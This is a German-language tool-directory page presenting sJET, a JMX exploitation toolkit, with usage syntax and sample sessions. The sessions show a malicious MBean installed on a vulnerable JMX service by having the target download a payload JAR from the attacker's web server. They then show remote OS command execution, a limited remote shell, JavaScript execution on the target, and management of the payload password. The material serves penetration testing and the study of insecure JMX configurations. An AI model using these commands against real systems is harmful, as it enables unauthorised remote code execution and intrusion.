Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
sjet — siberas JMX-Exploitation-Toolkit | Kitploit
Tools/GitHubGitHub/siberas/sjet
Payload-GenerierungExploitationCommand and ControlRemote-Access-Tool
GitHubsiberas/sjet

sjet

siberas JMX-Exploitation-Toolkit

Repository anzeigen
1339115vor 5 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

sJET von siberas

siberas JMX Exploitation Toolkit

sJET ermöglicht eine einfache Ausnutzung unsicher konfigurierter JMX-Dienste. Weitere Hintergrundinformationen finden Sie hier und hier.

Voraussetzungen

  • Jython 2.7

Verwendung

SJET implementiert ein CLI-Interface (mit argparse):

root@kitploit:~
jython sjet.py targetHost targetPort password MODE (modeOptions)

Wobei:

  • targetHost - die Ziel-IP-Adresse
  • targetPort - der Ziel-Port, auf dem JMX läuft
  • password - das Passwort, das während der Installation gesetzt wurde
  • MODE - der Skript-Modus
  • modeOptions - die Optionen für den ausgewählten Modus

Modi und modeOptions

  • install - installiert die Payload auf dem aktuellen Ziel
    • payload_url - vollständige URL zum Laden der Payload
    • payload_port - Port zum Laden der Payload
  • uninstall - deinstalliert die Payload vom aktuellen Ziel
  • password - ändert das Passwort auf einer bereits bereitgestellten Payload
    • password - das neue Passwort
  • command - führt den Befehl CMD auf dem Zielhost aus
    • CMD - der auszuführende Befehl
  • shell - startet eine einfache Shell auf dem Zielhost (mit den Einschränkungen von Java's Runtime.exec())
  • javascript - führt eine JavaScript-Datei FILENAME auf dem Zielhost aus
    • FILENAME - das auszuführende JavaScript

Beispiel

Installieren der Payload-MBean auf einem verletzlichen JMX-Dienst

Im folgenden Beispiel läuft der verletzliche JMX-Dienst auf 192.168.11.136:9991, der Angreifer hat die IP-Adresse 192.168.11.132. Der JMX-Dienst stellt eine Verbindung zum Webdienst des Angreifers her, um die Payload-JAR-Datei herunterzuladen. sJET startet den erforderlichen Webdienst auf Port 8000.

Nach erfolgreicher Installation der MBean wird das Standardpasswort auf das in der Kommandozeile angegebene Passwort ("super_secret") geändert.

root@kitploit:~
h0ng10@rocksteady:~/sjet$ jython sjet.py 192.168.11.136 9991 super_secret install http://192.168.11.132:8000 8000
sJET - siberas JMX Exploitation Toolkit
=======================================
[+] Starting webserver at port 8000
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.11.136:9991/jmxrmi
[+] Connected: rmi://192.168.11.132  1
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://192.168.11.132:8000
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
192.168.11.136 - - [22/Aug/2017 22:38:00] "GET / HTTP/1.1" 200 -
192.168.11.136 - - [22/Aug/2017 22:38:00] "GET /siberas_mlet.jar HTTP/1.1" 200 -
[+] Successfully loaded MBeanSiberas:name=payload,id=1
[+] Changing default password...
[+] Loaded de.siberas.lab.SiberasPayload
[+] Successfully changed password

h0ng10@rocksteady:~/sjet$

Ausführen des Befehls 'ls -la' auf einem Linux-Ziel:

Nachdem die Payload installiert wurde, können wir sie verwenden, um OS-Befehle auf dem Ziel auszuführen.

root@kitploit:~
h0ng10@rocksteady:~/sjet$ jython sjet.py 192.168.11.136 9991 super_secret command "ls -la"
sJET - siberas JMX Exploitation Toolkit
=======================================
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.11.136:9991/jmxrmi
[+] Connected: rmi://192.168.11.132  2
[+] Loaded de.siberas.lab.SiberasPayload
[+] Executing command: ls -la
total 16
drwxr-xr-x  4 root    root    4096 Aug 22 16:12 .
drwxr-xr-x 66 root    root    4096 Aug 22 16:12 ..
lrwxrwxrwx  1 root    root      12 Mär 29 01:46 conf -> /etc/tomcat8
drwxr-xr-x  2 tomcat8 tomcat8 4096 Mär 29 01:46 lib
lrwxrwxrwx  1 root    root      17 Mär 29 01:46 logs -> ../../log/tomcat8
drwxrwxr-x  3 tomcat8 tomcat8 4096 Aug 22 16:12 webapps
lrwxrwxrwx  1 root    root      19 Mär 29 01:46 work -> ../../cache/tomcat8


[+] Done
h0ng10@rocksteady:~/sjet$

Ausführen von ping im Shell-Modus auf einem Ziel

Wenn Sie nicht für jeden Befehl Java laden möchten, können Sie den "Shell-Modus" verwenden, um eine eingeschränkte Befehlsshell zu erhalten.

root@kitploit:~
h0ng10@rocksteady:~/sjet$ jython sjet.py 192.168.11.136 9991 super_secret shell
sJET - siberas JMX Exploitation Toolkit
=======================================
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.11.136:9991/jmxrmi
[+] Connected: rmi://192.168.11.132  3
[+] Use command 'exit_shell' to exit the shell
>>> ping -c 3 127.0.0.1
[+] Loaded de.siberas.lab.SiberasPayload
[+] Executing command: ping -c 3 127.0.0.1
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.075 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.046 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.044 ms

--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2050ms
rtt min/avg/max/mdev = 0.044/0.055/0.075/0.014 ms


>>> exit_shell
[+] Done
h0ng10@rocksteady:~/sjet$

Aufruf einer JavaScript-Payload auf einem Ziel:

Das Beispielskript "javaproperties.js" zeigt die Java-Eigenschaften des verletzlichen Dienstes an. Es kann wie folgt aufgerufen werden:

root@kitploit:~
h0ng10@rocksteady:~/sjet$ jython sjet.py 192.168.11.136 9991 super_secret javascript scripts/javaproperties.js
sJET - siberas JMX Exploitation Toolkit
=======================================
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.11.136:9991/jmxrmi
[+] Connected: rmi://192.168.11.132  4
[+] Loaded de.siberas.lab.SiberasPayload
[+] Executing script
java.vendor=Oracle Corporation
sun.java.launcher=SUN_STANDARD
catalina.base=/var/lib/tomcat8
sun.management.compiler=HotSpot 64-Bit Tiered Compilers
catalina.useNaming=true
os.name=Linux
...
java.vm.name=OpenJDK 64-Bit Server VM
file.encoding=UTF-8
java.specification.version=1.8


h0ng10@rocksteady:~/sjet$

Passwort ändern

Ändern des bestehenden Passworts ("super_secret") in "this-is-the-new-password":

root@kitploit:~
h0ng10@rocksteady:~/sjet$ jython sjet.py 192.168.11.136 9991 super_secret password this-is-the-new-password
sJET - siberas JMX Exploitation Toolkit
=======================================
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.11.136:9991/jmxrmi
[+] Connected: rmi://192.168.11.132  6
[+] Loaded de.siberas.lab.SiberasPayload
[+] Successfully changed password

[+] Done
h0ng10@rocksteady:~/sjet$

Deinstallieren der Payload-MBean vom Ziel

Deinstallieren der Payload 'Siberas' vom Ziel:

root@kitploit:~
minmaxer@prellermbp:~/sjet$ jython sjet.py 192.168.1.101 9010 super_secret uninstall
sJET - siberas JMX Exploitation Toolkit
=======================================
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.1.101:9010/jmxrmi
[+] Connected: rmi://192.168.1.1  16
[+] MBean correctly uninstalled
minmaxer@prellermbp:~/sjet$

Mitwirken

Fühlen Sie sich frei, einen Beitrag zu leisten.

Autoren

  • Hans-Martin Münch - Ursprüngliche Idee und Arbeit - h0ng10
  • Patricio Reller - CLI und zusätzliche Optionen - preller

Siehe auch die Liste der Mitwirkenden, die an diesem Projekt teilgenommen haben.

Lizenz

Dieses Projekt ist unter der MIT-Lizenz lizenziert - siehe die LICENSE-Datei für Details.

Tool herunterladen